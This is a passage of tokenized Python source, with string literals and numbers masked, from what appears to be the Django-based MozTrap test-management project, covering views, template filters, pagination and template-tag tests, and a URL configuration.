( ) <EOL> else : <EOL> return res <EOL> def save_related ( self , bundle ) : <EOL> """<STR_LIT>""" <EOL> super ( MTResource , self ) . save_related ( bundle ) <EOL> if bundle . request . META [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> bundle . obj . cc_version = self . model . objects . get ( <EOL> id = bundle . obj . id ) . cc_version <EOL> def _id_from_uri ( self , uri ) : <EOL> return uri . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:2> ] </s>
<s> """<STR_LIT>""" <EOL> from django . template import Library <EOL> register = Library ( ) <EOL> @ register . filter <EOL> def url ( sort , field ) : <EOL> return sort . url ( field ) <EOL> @ register . filter <EOL> def dir ( sort , field ) : <EOL> return sort . dir ( field ) </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . template . response import TemplateResponse <EOL> from moztrap . view . utils . auth import login_maybe_required <EOL> from moztrap import model <EOL> from moztrap . view . filters import RunCaseVersionFilterSet <EOL> from moztrap . view . lists import decorators as lists <EOL> from moztrap . view . utils . ajax import ajax <EOL> from . . finders import ResultsFinder <EOL> @ login_maybe_required <EOL> @ lists . finder ( ResultsFinder ) <EOL> @ lists . filter ( "<STR_LIT>" , filterset_class = RunCaseVersionFilterSet ) <EOL> @ lists . sort ( "<STR_LIT>" ) <EOL> @ ajax ( "<STR_LIT>" ) <EOL> def runcaseversions_list ( request ) : <EOL> """<STR_LIT>""" <EOL> return TemplateResponse ( <EOL> request , <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : model . RunCaseVersion . objects . only ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) . select_related ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> } <EOL> ) <EOL> @ login_maybe_required <EOL> def runcaseversion_details ( request , rcv_id ) : <EOL> """<STR_LIT>""" <EOL> runcaseversion = get_object_or_404 ( <EOL> model . RunCaseVersion , pk = rcv_id ) <EOL> return TemplateResponse ( <EOL> request , <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : runcaseversion <EOL> } <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import redirect <EOL> from . utils . auth import login_maybe_required <EOL> @ login_maybe_required <EOL> def home ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . user . has_perm ( "<STR_LIT>" ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> return redirect ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from tests import case <EOL> class ElementAdminTest ( case . admin . AdminTestCase ) : <EOL> app_label = "<STR_LIT>" <EOL> model_name = "<STR_LIT>" <EOL> def test_changelist ( self ) : <EOL> """<STR_LIT>""" <EOL> self . F . ElementFactory . create ( name = "<STR_LIT>" ) <EOL> self . get ( self . changelist_url ) . mustcontain ( "<STR_LIT>" ) <EOL> def test_change_page ( self ) : <EOL> """<STR_LIT>""" <EOL> e = self . F . ElementFactory . create ( name = "<STR_LIT>" ) <EOL> self . get ( self . change_url ( e ) ) . mustcontain ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from tests . case . api . crud import ApiCrudCases <EOL> import logging <EOL> mozlogger = logging . getLogger ( '<STR_LIT>' ) <EOL> class CaseStepResourceTest ( ApiCrudCases ) : <EOL> @ property <EOL> def factory ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . F . CaseStepFactory ( ) <EOL> @ property <EOL> def resource_name ( self ) : <EOL> return "<STR_LIT>" <EOL> @ property <EOL> def permission ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" <EOL> @ property <EOL> def new_object_data ( self ) : <EOL> """<STR_LIT>""" <EOL> modifiers = ( self . datetime , self . resource_name ) <EOL> self . caseversion_fixture = self . F . CaseVersionFactory . create ( ) <EOL> fields = { <EOL> u"<STR_LIT>" : unicode ( <EOL> self . get_detail_url ( "<STR_LIT>" , str ( self . caseversion_fixture . id ) ) ) , <EOL> u"<STR_LIT>" : <NUM_LIT:1> , <EOL> u"<STR_LIT>" : u"<STR_LIT>" % self . datetime , <EOL> u"<STR_LIT>" : u"<STR_LIT>" % self . datetime , <EOL> } <EOL> return fields <EOL> def backend_object ( self , id ) : <EOL> """<STR_LIT>""" <EOL> return self . model . CaseStep . everything . get ( id = id ) <EOL> def backend_data ( self , backend_obj ) : <EOL> """<STR_LIT>""" <EOL> actual = { <EOL> u"<STR_LIT:id>" : backend_obj . id , <EOL> u"<STR_LIT>" : unicode ( <EOL> self . get_detail_url ( "<STR_LIT>" , <EOL> str ( backend_obj . caseversion . id ) ) ) , <EOL> u"<STR_LIT>" : unicode ( backend_obj . instruction ) , <EOL> u"<STR_LIT>" : unicode ( backend_obj . expected ) , <EOL> u"<STR_LIT>" : backend_obj . number , <EOL> u"<STR_LIT>" : unicode ( <EOL> self . get_detail_url ( self . resource_name , str ( backend_obj . id ) ) ) <EOL> } <EOL> return actual <EOL> @ property <EOL> def read_create_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ "<STR_LIT>" ] </s>
<s> """<STR_LIT>""" <EOL> from mock import Mock <EOL> from django . core . exceptions import SuspiciousOperation <EOL> from tests import case <EOL> from tests . utils import Url <EOL> class TestFromRequest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import from_request <EOL> return from_request <EOL> def _check ( self , GET , result ) : <EOL> """<STR_LIT>""" <EOL> request = Mock ( ) <EOL> request . GET = GET <EOL> self . assertEqual ( self . func ( request ) , result ) <EOL> def test_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { } , ( <NUM_LIT:20> , <NUM_LIT:1> ) ) <EOL> def test_set ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { "<STR_LIT>" : <NUM_LIT:10> , "<STR_LIT>" : <NUM_LIT:2> } , ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> def test_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:2> } , ( <NUM_LIT:20> , <NUM_LIT:2> ) ) <EOL> def test_negative ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { "<STR_LIT>" : <NUM_LIT:20> , "<STR_LIT>" : - <NUM_LIT:2> } , ( <NUM_LIT:20> , <NUM_LIT:1> ) ) <EOL> def test_valid_number_but_not_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> request = Mock ( ) <EOL> request . GET = { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT:1> } <EOL> self . assertRaises ( <EOL> SuspiciousOperation , <EOL> self . func , <EOL> request <EOL> ) <EOL> class TestPagesizeUrl ( case . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import pagesize_url <EOL> return pagesize_url <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . func ( "<STR_LIT>" , <NUM_LIT:10> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> def test_override ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . func ( "<STR_LIT>" , <NUM_LIT:10> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> class TestPagenumberUrl ( case . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import pagenumber_url <EOL> return pagenumber_url <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . func ( "<STR_LIT>" , <NUM_LIT:3> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> def test_override ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . func ( "<STR_LIT>" , <NUM_LIT:5> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> class TestPager ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def pager ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import Pager <EOL> return Pager <EOL> def qs ( self , count ) : <EOL> """<STR_LIT>""" <EOL> qs = Mock ( ) <EOL> qs . count . return_value = count <EOL> qs . empty . return_value = [ ] <EOL> qs . __getitem__ = Mock ( ) <EOL> return qs <EOL> def test_sizes_with_standard_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> self . assertEqual ( p . sizes ( ) , [ <NUM_LIT:10> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT:100> ] ) <EOL> def test_sizes_with_nonstandard_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:15> , <NUM_LIT:1> ) <EOL> self . assertEqual ( p . sizes ( ) , [ <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT:100> ] ) <EOL> def test_pages_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_pages_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:10> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_pages_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_pages_more_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_display_pages_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_display_pages_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:10> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_display_pages_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_display_pages_more_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_display_pages_long_on_first ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , None , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_on_last ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:12> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , None , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_near_one_end ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:5> ) <EOL> self . assertEqual ( <EOL> list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , None , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_near_other_end ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:9> ) <EOL> self . assertEqual ( <EOL> list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , None , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_in_middle ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:8> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , None , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , None , <NUM_LIT> , <NUM_LIT:15> ] ) <EOL> def test_total ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:10> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( p . total , <NUM_LIT:10> ) <EOL> def test_total_cached ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = self . qs ( <NUM_LIT:10> ) <EOL> p = self . pager ( qs , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> p . total <EOL> p . total <EOL> self . assertEqual ( qs . count . call_count , <NUM_LIT:1> ) <EOL> def test_objects ( self ) : <EOL> """<STR_LIT>""" <EOL> products = [ <EOL> self . F . ProductFactory . create ( name = "<STR_LIT>" . format ( i ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> ] <EOL> p = self . pager ( products [ <NUM_LIT:0> ] . __class__ . objects . all ( ) , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . objects ) , products [ : <NUM_LIT:3> ] ) <EOL> def test_objects_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . objects ) , [ ] ) <EOL> def test_sliced_queryset_cached ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = self . qs ( <NUM_LIT:10> ) <EOL> p = self . pager ( qs , <NUM_LIT:5> , <NUM_LIT:1> ) <EOL> p . objects <EOL> p . objects <EOL> self . assertEqual ( qs . __getitem__ . call_count , <NUM_LIT:1> ) <EOL> def test_num_pages_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:1> ) <EOL> def test_num_pages_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:15> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:1> ) <EOL> def test_num_pages_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:1> ) <EOL> def test_num_pages_more_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:2> ) <EOL> def test_low_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:0> ) <EOL> def test_high_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:0> ) <EOL> def test_low_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:15> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:1> ) <EOL> def test_high_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:15> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:15> ) <EOL> def test_low_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:1> ) <EOL> def test_high_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:20> ) <EOL> def test_low_more_than_size_page1 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:1> ) <EOL> def test_high_more_than_size_page1 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:20> ) <EOL> def test_low_more_than_size_page2 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:2> ) . low , <NUM_LIT> ) <EOL> def test_high_more_than_size_page2 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:2> ) . high , <NUM_LIT> ) <EOL> def test_prev_none ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . prev , None ) <EOL> def test_prev ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:2> ) . prev , <NUM_LIT:1> ) <EOL> def test_next_none ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . next , None ) <EOL> def test_next ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . next , <NUM_LIT:2> ) <EOL> class TestPositiveInteger ( case . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import positive_integer <EOL> return positive_integer <EOL> def test_negative ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( - <NUM_LIT:1> , <NUM_LIT:5> ) , <NUM_LIT:1> ) <EOL> def test_zero ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( <NUM_LIT:0> , <NUM_LIT:5> ) , <NUM_LIT:1> ) <EOL> def test_positive ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( <NUM_LIT:1> , <NUM_LIT:5> ) , <NUM_LIT:1> ) <EOL> def test_none ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( None , <NUM_LIT:5> ) , <NUM_LIT:5> ) <EOL> def test_string ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( "<STR_LIT>" , <NUM_LIT:5> ) , <NUM_LIT:5> ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> from django . template import Template , Context <EOL> import mock <EOL> from tests import case <EOL> class ResultForTest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> def result_for ( self , runcaseversion , user , environment , render ) : <EOL> """<STR_LIT>""" <EOL> t = Template ( <EOL> "<STR_LIT>" <EOL> + render ) <EOL> return t . render ( <EOL> Context ( { "<STR_LIT>" : runcaseversion , "<STR_LIT:user>" : user , "<STR_LIT>" : environment } ) ) <EOL> def test_result_exists ( self ) : <EOL> """<STR_LIT>""" <EOL> r = self . F . ResultFactory ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r . runcaseversion , r . tester , r . environment , "<STR_LIT>" ) , <EOL> str ( r . id ) <EOL> ) <EOL> def test_dupe_complete_results_keeps_both_finds_latest ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( "<STR_LIT>" ) as mock_utcnow : <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r = self . F . ResultFactory ( <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r2 = self . F . ResultFactory ( <EOL> tester = r . tester , <EOL> runcaseversion = r . runcaseversion , <EOL> environment = r . environment , <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r . runcaseversion , r . tester , r . environment , "<STR_LIT>" ) , <EOL> str ( r2 . id ) , <EOL> ) <EOL> self . assertEqual ( self . model . Result . objects . count ( ) , <NUM_LIT:2> ) <EOL> def test_dupe_incomplete_results_keeps_both_finds_latest ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( "<STR_LIT>" ) as mock_utcnow : <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r = self . F . ResultFactory ( ) <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> r2 = self . F . ResultFactory ( <EOL> tester = r . tester , <EOL> runcaseversion = r . runcaseversion , <EOL> environment = r . environment , <EOL> ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r . runcaseversion , r . tester , r . environment , "<STR_LIT>" ) , <EOL> str ( r2 . id ) , <EOL> ) <EOL> self . assertEqual ( self . model . Result . objects . count ( ) , <NUM_LIT:2> ) <EOL> def test_dupe_latest_results_sets_non_latest_to_false ( self ) : <EOL> """<STR_LIT>""" <EOL> with mock . patch ( "<STR_LIT>" ) as mock_utcnow : <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> res1 = self . F . ResultFactory ( <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> res2 = self . F . ResultFactory ( <EOL> tester = res1 . tester , <EOL> runcaseversion = res1 . runcaseversion , <EOL> environment = res1 . environment , <EOL> status = "<STR_LIT>" , <EOL> ) <EOL> mock_utcnow . return_value = datetime . datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> ) <EOL> self . model . Result . objects . filter ( pk = res1 . pk ) . update ( <EOL> is_latest = True , <EOL> ) <EOL> self . assertEqual ( self . result_for ( <EOL> res1 . runcaseversion , <EOL> res1 . tester , <EOL> res1 . environment , <EOL> "<STR_LIT>" , <EOL> ) , str ( res2 . id ) ) <EOL> self . assertEqual ( self . model . Result . objects . count ( ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( <EOL> self . model . Result . objects . get ( is_latest = True ) . pk , res2 . pk ) <EOL> def test_result_does_not_exist ( self ) : <EOL> """<STR_LIT>""" <EOL> rcv = self . F . RunCaseVersionFactory . create ( ) <EOL> env = self . F . EnvironmentFactory . create ( ) <EOL> user = self . F . UserFactory . create ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> rcv , <EOL> user , <EOL> env , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( rcv . id , env . id , user . id ) <EOL> ) <EOL> class StepResultForTest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> def result_for ( self , result , step , render ) : <EOL> """<STR_LIT>""" <EOL> t = Template ( <EOL> "<STR_LIT>" <EOL> + render ) <EOL> return t . render ( <EOL> Context ( { "<STR_LIT:result>" : result , "<STR_LIT>" : step } ) ) <EOL> def test_stepresult_exists ( self ) : <EOL> """<STR_LIT>""" <EOL> sr = self . F . StepResultFactory ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> sr . result , sr . step , "<STR_LIT>" ) , <EOL> str ( sr . id ) <EOL> ) <EOL> def test_step_result_does_not_exist ( self ) : <EOL> """<STR_LIT>""" <EOL> r = self . F . ResultFactory . create ( ) <EOL> step = self . F . CaseStepFactory . create ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r , <EOL> step , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( r . id , step . id ) <EOL> ) <EOL> def test_result_does_not_exist ( self ) : <EOL> """<STR_LIT>""" <EOL> r = self . F . ResultFactory . build ( ) <EOL> step = self . F . CaseStepFactory . create ( ) <EOL> self . assertEqual ( <EOL> self . result_for ( <EOL> r , <EOL> step , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( step . id ) <EOL> ) <EOL> class SuitesForTest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> def suites_for ( self , run , runcaseversion , render ) : <EOL> """<STR_LIT>""" <EOL> t = Template ( <EOL> "<STR_LIT>" <EOL> + render ) <EOL> return t . render ( <EOL> Context ( { "<STR_LIT>" : run , "<STR_LIT>" : runcaseversion } ) ) <EOL> def test_multiple_source_suites ( self ) : <EOL> """<STR_LIT>""" <EOL> envs = self . F . EnvironmentFactory . create_set ( [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ) <EOL> pv = self . F . ProductVersionFactory ( environments = envs ) <EOL> tc = self . F . CaseFactory . create ( product = pv . product ) <EOL> cv = self . F . CaseVersionFactory . create ( <EOL> case = tc , productversion = pv , status = "<STR_LIT>" ) <EOL> ts1 = self . F . SuiteFactory . create ( product = pv . product , status = "<STR_LIT>" ) <EOL> self . F . SuiteCaseFactory . create ( suite = ts1 , case = tc ) <EOL> ts2 = self . F . SuiteFactory . create ( product = pv . product , status = "<STR_LIT>" ) <EOL> self . F . SuiteCaseFactory . create ( suite = ts2 , case = tc ) <EOL> r = self . F . RunFactory . create ( productversion = pv , environments = envs ) <EOL> self . F . RunSuiteFactory . create ( suite = ts1 , run = r ) <EOL> self . F . RunSuiteFactory . create ( suite = ts2 , run = r ) <EOL> r . activate ( ) <EOL> self . assertEqual ( <EOL> self . suites_for ( <EOL> r , <EOL> self . model . RunCaseVersion . objects . get ( ) , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( ts1 . id , ts2 . id ) <EOL> ) <EOL> def test_source_suite ( self ) : <EOL> """<STR_LIT>""" <EOL> envs = self . F . EnvironmentFactory . create_set ( [ "<STR_LIT>" ] , [ "<STR_LIT>" ] ) <EOL> pv = self . F . ProductVersionFactory ( environments = envs ) <EOL> tc = self . F . CaseFactory . create ( product = pv . product ) <EOL> self . F . CaseVersionFactory . create ( <EOL> case = tc , productversion = pv , status = "<STR_LIT>" ) <EOL> ts = self . F . SuiteFactory . create ( product = pv . product , status = "<STR_LIT>" ) <EOL> self . F . SuiteCaseFactory . create ( suite = ts , case = tc ) <EOL> r = self . F . RunFactory . create ( productversion = pv , environments = envs ) <EOL> self . F . RunSuiteFactory . create ( suite = ts , run = r ) <EOL> r . activate ( ) <EOL> rcv = r . runcaseversions . get ( ) <EOL> self . assertEqual ( <EOL> self . suites_for ( <EOL> r , <EOL> self . model . RunCaseVersion . objects . get ( ) , <EOL> "<STR_LIT>" ) , <EOL> "<STR_LIT>" . format ( ts . id ) <EOL> ) </s>
<s> from django . conf . urls import url <EOL> import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . admin , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . manage_project , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . manage_project , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . get_slug , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
